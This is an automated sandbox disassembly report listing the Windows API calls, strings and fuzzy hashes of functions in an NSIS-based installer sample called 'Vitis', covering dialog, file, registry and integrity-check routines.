SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9

Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E

Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 004067F1
Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,00437800,00437800,004037DA), ref: 00406800
Part of subcall function 0040678E: CharNextW.USER32(?,00000000,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 00406805
Part of subcall function 0040678E: CharPrevW.USER32(?,?,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 00406818

GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7

Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

A, xrefs: 00404A77

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
Opcode Fuzzy Hash: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,?,?,?,?,00403847,?), ref: 004030AA

Part of subcall function 00405FF7: GetFileAttributesW.KERNEL32(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
GlobalAlloc.KERNEL32(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
Null, xrefs: 00403174
G8@, xrefs: 00403227, 00403242
soft, xrefs: 0040316B
Inst, xrefs: 00403162
Error launching installer, xrefs: 004030CD

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-4108474850
Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406544 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 196stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004281C0,00000400), ref: 0040665F
GetWindowsDirectoryW.KERNEL32(004281C0,00000400,00000000,004226E8,?,004055A0,004226E8,00000000,00000000,?,00000000), ref: 00406672
lstrcatW.KERNEL32(004281C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
lstrlenW.KERNEL32(004281C0,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040662D
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066E3

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-730719616
Opcode ID: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
Opcode Fuzzy Hash: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
lstrlenW.KERNEL32(004033ED,004226E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00406544: lstrcatW.KERNEL32(004281C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(004281C0,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743

Strings

&B, xrefs: 0040558A

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: &B
API String ID: 1495540970-3208460036
Opcode ID: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
Opcode Fuzzy Hash: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044E7
GetSysColor.USER32(00000000), ref: 00404525
SetTextColor.GDI32(?,00000000), ref: 00404531
SetBkMode.GDI32(?,?), ref: 0040453D
GetSysColor.USER32(?), ref: 00404550
SetBkColor.GDI32(?,?), ref: 00404560
DeleteObject.GDI32(?), ref: 0040457A
CreateBrushIndirect.GDI32(?), ref: 00404584

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403315
GetTickCount.KERNEL32 ref: 00403396
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033C3
wsprintfW.USER32 ref: 004033D6

Strings

G8@, xrefs: 004032B4
... %d%%, xrefs: 004033D0

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$G8@
API String ID: 551687249-649311722
Opcode ID: a26557732bb01f6bddedaf8222426b1e26193f42140191bec4bb00bd26e51081
Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
Opcode Fuzzy Hash: a26557732bb01f6bddedaf8222426b1e26193f42140191bec4bb00bd26e51081
Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
GetMessagePos.USER32 ref: 00404E41
ScreenToClient.USER32(?,?), ref: 00404E5B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93

Strings

f, xrefs: 00404E6F

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(?,00000064,?), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58

Uniqueness

Uniqueness Score: -1.00%

Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
wsprintfW.USER32 ref: 004068B6
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA

Strings

UXTHEME, xrefs: 0040686D
%s%S.dll, xrefs: 004068B0
\, xrefs: 0040688C

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
Opcode Fuzzy Hash: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040678E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 004067F1
CharNextW.USER32(?,?,?,00000000,?,004034D2,00437800,00437800,004037DA), ref: 00406800
CharNextW.USER32(?,00000000,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 00406805
CharPrevW.USER32(?,?,74DF3420,00437800,?,004034D2,00437800,00437800,004037DA), ref: 00406818

Strings

*?|<>/":, xrefs: 004067E0

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5C8,0040A5C8,00000000,00000000,0040A5C8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
Opcode Fuzzy Hash: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 00406544: lstrcatW.KERNEL32(004281C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(004281C0,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

